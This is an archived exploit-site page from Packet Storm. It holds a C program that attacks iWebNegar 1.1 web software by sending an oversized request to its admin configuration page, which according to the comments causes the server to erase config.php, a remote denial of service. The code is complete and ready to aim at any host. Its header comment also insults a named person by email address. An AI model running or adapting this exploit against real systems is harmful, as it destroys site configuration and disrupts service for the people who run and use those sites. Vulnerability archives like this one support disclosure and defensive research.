exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

iWebNegar.c

iWebNegar.c
Posted Jan 5, 2005
Authored by c0d3r, hossein asgary

iWebNegar version 1.1 remote configuration nullification denial of service exploit.

tags | exploit, remote, denial of service
SHA-256 | 0e91bdce0b0968f8e3ac0ed16e3e026aa3db29b4307b18844c908554d10e9f01

iWebNegar.c

Change Mirror Download
/*
iwebnegar 1.1 remote exploit
c0ded by root / c0d3r " kaveh razavi ": c0d3rz_team@yahoo.com
bug found by " hossein asgary " in simorgh-ev security team ( u rux hossein )
compile with Ms visual C++ (the php version written by the bug finder but still priv8)
greetz : LorD & NT from IHS , vbehzadan & sIiiS from hyper-security.com ,
Jamie & Ben from exploitdev .
Lamer : shervin_kesafat@yahoo.com ( who can fuck him ? )
*/
/* there is a limited buffer in the php code of iwebnegar when u overflow it , it will
go to Die() functions which cause the erase of config.php
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define size 300



int main (int argc, char *argv[]){



char req[] =
"GET /admin/conf_edit.php?";
unsigned int rc,addr,sock ;
struct sockaddr_in tcp;
struct hostent * hp;
WSADATA wsaData;
char buffer[size];

memset(buffer,'A',300);
memcpy(buffer,req,25);

if(argc < 2) {
printf("\nusage : iwebnegar host\n");
printf("example : iwebnegar.exe 127.0.0.1\n");
exit(-1) ;
}

if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
printf("WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) ){
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock){
printf("socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
else
tcp.sin_addr.s_addr = addr;

if (hp)
tcp.sin_family = hp->h_addrtype;
else
tcp.sin_family = AF_INET;

tcp.sin_port=htons(80);

printf("\n[+] attacking host %s\n" , argv[1]) ;
printf("[+] Building overflow string\n");
Sleep(1000);
printf("[+] packet size = %d byte\n" , sizeof(buffer));
rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc==0)
{

Sleep(1000) ;
printf("[+] connected\n") ;

send(sock , buffer , sizeof(buffer) , 0);

printf("[+] see if the config.php erased ! \n\n") ;

}
else {
printf("the 80 port is not open try another webserver port\n");


}
}

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close